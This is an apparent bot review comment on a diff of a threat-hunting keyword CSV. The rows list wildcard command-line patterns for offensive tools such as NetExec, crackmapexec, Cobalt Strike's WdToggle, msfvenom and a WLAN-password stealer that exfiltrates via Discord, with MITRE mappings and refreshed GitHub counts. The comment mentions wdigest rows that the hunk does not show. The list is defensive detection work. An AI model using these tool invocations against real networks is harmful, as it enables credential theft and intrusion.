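Review bot: The refreshed crackmapexec rows `* --wdigest disable*` and `* --wdigest enable*`, and the linWinPwn row above them, still carry `N/A` in what appears to be `metadata_severity_score`, assuming this file uses the same column order as the header shown for greyware_tool_keyword.csv. A consumer that filters or ranks on severity will drop or under-rank these rows, even though `--wdigest enable` changes how Windows caches logon credentials and is a high-signal indicator for defenders. Since the rows are being rewritten anyway, the field run `"N/A","N/A","10"` could carry an explicit severity in its second position, in line with the scored wfuzz and PowerSharpPack rows in this hunk. Mixing star and fork refreshes with detection content also makes real keyword changes hard to spot in review, so keeping the GitHub counters in a separate generated file would help.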
@@ -2077,76 +2077,76 @@ "* whois-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* winDefKiller *","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","0","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "* windows/csharp_exe*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"* windows/shell/bind_tcp *","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"* Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"* -winPEAS *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* winrm * -u * -p * --laps*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* winrm * -u * -p * -X whoami*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* windows/shell/bind_tcp *","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* -winPEAS *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* winrm * -u * -p * --laps*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* winrm * -u * -p * -X whoami*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --wldp-bypass=*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"* --wmi *SELECT *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --wmi-namespace 'root\cimv2'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wmi *SELECT *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wmi-namespace 'root\cimv2'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* wmirun=true dllpath=*.dll* computername=*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "* -wordlist * -spawnto *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"* --wordlist=*.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --wordlist=*.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* -word-list-path * -file-extensions *","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" -"* -WorkingHours *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -WorkingHours *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --wpad --lm --ProxyAuth --disable-ess**","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* WriteToLsass*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest 
credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" -"* -X '$PSVersionTable' *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -X '[System.Environment]::Is64BitProcess'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -X FUZZ http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"* -X '$PSVersionTable' *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -X '[System.Environment]::Is64BitProcess'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -X FUZZ http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* x11-access.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmlrpc-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmpp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmpp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
